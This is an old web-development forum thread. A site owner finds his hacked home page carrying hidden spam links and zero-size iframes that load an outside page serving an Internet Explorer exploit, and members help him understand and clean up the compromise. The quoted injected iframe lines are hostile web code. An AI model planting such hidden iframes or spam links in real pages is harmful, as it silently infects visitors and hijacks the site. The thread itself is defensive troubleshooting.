Viruses on website - help & questions

	Home Register Search Help Login

Sponsors

Shopping Cart Software
Ecommerce software integrated into Frontpage, Dreamweaver and Golive templates. No monthly fees and available in ASP and PHP versions.

Website Templates
We also have a wide selection of Dreamweaver, Expression Web and Frontpage templates as well as webmaster tools and CSS layouts.

Frontpage website templates
Creative Website Templates for FrontPage, Dreamweaver, Flash, SwishMax

Search Forums

Recent Posts

Todays Posts
Most Active posts
Posts since last visit
My Recent Posts
Mark posts read

Viruses on website - help & questions

View related threads: (in this forum | in all forums)

Logged in as: Guest

Users viewing this topic: none

Printable Version

All Forums >> Web Development >> Server Issues >> Viruses on website - help & questions

Page: [1]


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	Viruses on website - help & questions - 10/16/2006 12:30:29 Hi - it's been a while since I've posted here - no particular reason - but today I urgently need some help and advice... A few weeks back I accessed my site from someone's PC and their virus scanner immediately blocked a virus. I wasn't sure if it related to my site or not but just a short while after it happened again! I contacted the hosts who assured me that all was clear. Today I have had a call from someone informing me that the site has several viruses - detected by their AV. I have left a message with the hosts but am wondering if there is anything else I can do? Here's a question first... Does this mean that my site in particular is infected or is the whole server infected and the same would be happening to all sites on that server? Anyhow, any help, information and advice would be appreciated. _____________________________ Regards, Rick On-The-Web-Now!


Spooky Posts: 26598 Joined: 11/11/1998 From: Middle Earth Status: offline	RE: Viruses on website - help & questions - 10/16/2006 14:30:09 Do you have any more details on the detected virus? _____________________________ If you arent part of the solution, then there is good money to be made prolonging the problem ��k� Database / DRW help Check out the Tutorials for Frontpage Databases Forum FAQ' s Developers Edition Spooky Login User Registration and Management tool Personalized Frontpage Hosting (in reply to RickP)


jaybee Posts: 14070 Joined: 10/7/2003 From: Berkshire, UK Status: offline	RE: Viruses on website - help & questions - 10/16/2006 16:49:36 Find out from all of them which AV they're using. If your host says it's clean and they're all using the same one, suspect false positives. _____________________________ If it ain't broke..... fix it until it is. GAWDS Now where did I put that Doctype? (in reply to Spooky)


BobbyDouglas Posts: 5440 Joined: 5/15/2003 From: Arizona Status: offline	RE: Viruses on website - help & questions - 10/16/2006 18:47:41 Unix/linux web hosts don't run the normal batch of AV software that most consumers are used to. The best thing to do is ask you host for a zip of the entire hosting account (even the stuff located below the public_html and www folders). Then use your AV to scan the zip file. _____________________________ Arizona Web Design - Mr Bobs Web Design in Arizona The Arizona Web Hosting Challenge (in reply to jaybee)


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	RE: Viruses on website - help & questions - 10/17/2006 3:42:58 Thanks to all for the useful replies I've just accessed the site and my AV caught this... The JScript/Ludvc.1ip!Trojan was detected in C:\DOCUMENTS AND SETTINGS\RICK\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\OF93A2JT\TEST[1].HTM. Machine: MAXX, User: MAXX\Rick. File Status: File was cured; system cure performed. _____________________________ Regards, Rick On-The-Web-Now! (in reply to BobbyDouglas)

RickP

Posts: 665
Joined: 11/13/2004
From: Kent, U.K.
Status: offline

RE: Viruses on website - help & questions - 10/17/2006 3:49:38

The home page has been hacked and the code below inserted

quote:

<a href="http://www.ivorysky.com/img/flags/10px/company_uniform.html">company uniform</a>
<a href="http://www.ivorysky.com/img/flags/10px/postal_trucks_for_sale.html">trucks for sale</a>
<a href="http://www.ivorysky.com/img/flags/10px/usmc_wwii_uniforms.html">wwii uniforms</a>
<a href="http://www.ivorysky.com/img/flags/10px/for_sale_aluma_laser.html">aluma laser</a>
<a href="http://www.ivorysky.com/img/flags/10px/bad_credit_home_purchase_loan.html">bad credit home loan</a>
<a href="http://www.ivorysky.com/img/flags/10px/terra_travel.html">terra travel</a>

Also this (which was the problem before) warning, the follow links below may contain a virus

quote:

<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>
<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>

< Message edited by BobbyDouglas -- 10/17/2006 9:24:50 >

_____________________________

Regards, Rick
On-The-Web-Now!

(in reply to RickP)


jaybee Posts: 14070 Joined: 10/7/2003 From: Berkshire, UK Status: offline	RE: Viruses on website - help & questions - 10/17/2006 5:51:25 Looking at that and doing some checking... The first one, ivorysky, is local to me so I could go round and break his legs for you. BUT, I don't think it's him. All the links are 404 and having checked his site it looks to me like he got hacked too and a folder of banners inserted. They've now gone. Check your site to make sure there are no new folders appearing. The second one however is Russian. Oh surprise, surprise. Domain Name: ISECUREPAGES.NET Registrant: hcenter Petrov Vladimir Vladimirovich hcenter@list.ru ul. Lenina, d. 20, kv.5 Moskva Moskva,111111 RU Tel. +7.1111111111 Now he's obviously got in via a security hole. What PHP scripts are you running? _____________________________ If it ain't broke..... fix it until it is. GAWDS Now where did I put that Doctype? (in reply to RickP)


BobbyDouglas Posts: 5440 Joined: 5/15/2003 From: Arizona Status: offline	RE: Viruses on website - help & questions - 10/17/2006 9:34:05 Most likely a bot just scanned your website and found a very outdated script. You really won't even be able to tell that you have been hacked until you get the virus warnings. I would 1) find out how the person came in 2) correct the hole 3) revert back to a backup before you were hacked As long as your database is displaying the correct data, then you should be able to back up the database (on the hacked site) and then restore all html/php/asp files and then use the latest database. Every case I have seen where the database still displays normal data, it has not been tampered with. You still take a chance though restoring that db. If you are with a good host, they should help you out a bit in terms of getting everything resolved. _____________________________ Arizona Web Design - Mr Bobs Web Design in Arizona The Arizona Web Hosting Challenge (in reply to jaybee)


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	RE: Viruses on website - help & questions - 10/17/2006 12:26:33 Bobby... Thanks for the sensible edit to my post - re virus warnings related to the URLs, and for the further suggestions. I wonder, would it be best to delete the entire site and just upload it again? Jaybee... Yes, the PHP contact form could be a weak spot (?). I spent a lot of time seeking out a 'secure' type form to use as a basis for it but I cannot properly judge as my PHP knowledge is limited to adapting pre-written scripts only. Do you know which is the 'best' script available? I notice that a lot of forms are now using a graphic with disguised numbers/letter to enter, which are not machine readable but I suppose that will only stop automated attacks but not if someone wants to abuse the form in person, so to speak. I have some further info from my hosts... quote: There was a problem a few weeks ago whereby code was added to some sites on some of our servers. This was possible due to a cPanel exploit that has since been patched by cPanel... ...the virus on the web site tries to exploit a security hole in IE, the VML exploit, but this has since been patched by Microsoft... I'm really fed up today Oh, P.S. Jaybee, you're very sweet, offering to breaks legs and all that - not really necessary but it's a much appreciated sentiment _____________________________ Regards, Rick On-The-Web-Now! (in reply to BobbyDouglas)

jaybee

Posts: 14070
Joined: 10/7/2003
From: Berkshire, UK
Status: offline

RE: Viruses on website - help & questions - 10/17/2006 12:42:37

quote:

Do you know which is the 'best' script available?

It's unlikely they can get in via a form but go to the CSS Forum and there's a post on there from Mike Cherim about a secure accessible form he's been working on. You can download it all free from his site, there are great instructions on the page as well. If you get any problems I'm sure he'd be happy to hear from you.

quote:

This was possible due to a cPanel exploit that has since been patched by cPanel...

Then that is not your problem, well the aftermath is but the original hole isn't. Still go get Mike's form though.

My site got whacked via phpBB and along with many thousands of others, all the pages were defaced. I wiped the lot then reloaded the entire site.

quote:

a problem a few weeks ago

!!! and they didn't think to mention it! I'd get round the entire problem by getting a new host.

< Message edited by jaybee -- 10/17/2006 12:48:33 >

_____________________________

If it ain't broke..... fix it until it is.

GAWDS
Now where did I put that Doctype?

(in reply to RickP)


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	RE: Viruses on website - help & questions - 10/17/2006 12:54:11 quote: It's unlikely they can get in via a form I'd like to hope so - but I'm sure they somehow use (abuse) forms for sending spam - again, not sure how but it would be great to have a truly secure form. I'll check that one out _____________________________ Regards, Rick On-The-Web-Now! (in reply to jaybee)


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	RE: Viruses on website - help & questions - 10/17/2006 12:55:45 BTW... anyone... Are the inserted code and the virus two issues or one? _____________________________ Regards, Rick On-The-Web-Now! (in reply to RickP)


BobbyDouglas Posts: 5440 Joined: 5/15/2003 From: Arizona Status: offline	RE: Viruses on website - help & questions - 10/17/2006 14:17:26 Just curious, who was hosting that website for ya? quote: Are the inserted code and the virus two issues or one? - Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus. _____________________________ Arizona Web Design - Mr Bobs Web Design in Arizona The Arizona Web Hosting Challenge (in reply to RickP)


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	RE: Viruses on website - help & questions - 10/18/2006 15:49:09 quote: Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus. Ah, I see, so the virus itself is not on my server - right? Is the whole point just to spread a virus? Or is the goal to raise G rankings with the links but the virus just happens to be on one of the lnked site? If no-one sees of activates the links how can the virus come from the other site(s)? or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe? questions, questions, I know, but this would be good to know - thanks! _____________________________ Regards, Rick On-The-Web-Now! (in reply to BobbyDouglas)

BobbyDouglas

Posts: 5440
Joined: 5/15/2003
From: Arizona
Status: offline

RE: Viruses on website - help & questions - 10/18/2006 23:51:28

quote:

Ah, I see, so the virus itself is not on my server - right?

- It is most likely NOT on your actual server. There could also be viruses on your server, but the one we're talking about here is not on your server.

quote:

Is the whole point just to spread a virus?

- Yes

quote:

If no-one sees of activates the links how can the virus come from the other site(s)? or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe?

- It isn't a link. Basically, you have an iframe (that was most likely inserted by an exploit), that calls on a page at another website, and that page that it is calling has the virus. The virus appears to be an IE exploit. When you try to view the source of the page, it only shows an encrypted piece of javascript.

Btw, if you are running a site that is generating income, it might be a good idea to ditch the cheap host.

_____________________________

Arizona Web Design - Mr Bobs Web Design in Arizona
The Arizona Web Hosting Challenge

(in reply to RickP)


RickP Posts: 665 Joined: 11/13/2004 From: Kent, U.K. Status: offline	RE: Viruses on website - help & questions - 10/19/2006 7:48:14 Thanks Bobby, that clarifies a lot _____________________________ Regards, Rick On-The-Web-Now! (in reply to BobbyDouglas)

Page: [1]

All Forums >> Web Development >> Server Issues >> Viruses on website - help & questions

Page: [1]

Jump to: 1

New Messages	No New Messages
Hot Topic w/ New Messages	Hot Topic w/o New Messages
Locked w/ New Messages	Locked w/o New Messages

Post New Thread

Reply to Message

Post New Poll

Submit Vote

Delete My Own Post

Delete My Own Thread

Rate Posts